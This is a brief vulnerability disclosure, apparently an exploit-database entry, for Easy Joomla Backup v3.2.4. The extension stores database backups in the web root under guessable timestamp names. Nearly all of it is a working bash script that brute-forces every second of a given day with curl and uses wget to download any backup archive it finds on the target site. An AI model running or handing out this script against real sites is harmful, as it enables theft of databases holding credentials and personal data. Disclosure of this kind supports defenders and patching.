Title:Joomla extension Easy Joomla Backup v3.2.4 database backup exposureThe software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp: http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip#!/bin/bash #Larry W. Cashdollar, @_larry0 9/7/2017 #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4 #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup MONTH=09 DAY=07 YEAR=2017 Z=0 #May need to set the DOMAIN to $1 the target depending on how WP is configured. DOMAIN=192.168.0.163 echo "Scanning website for available backups:" for y in `seq -w 0 23`; do for x in `seq -w 0 59`; do Y=`echo "scale=2;($Z/86000)*100"|bc`; echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%" for z in `seq -w 0 59`; do Z=$(( $Z + 1 )); CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "" echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo "Downloading......"; wget $CPATH fi; done done done echo "Completed."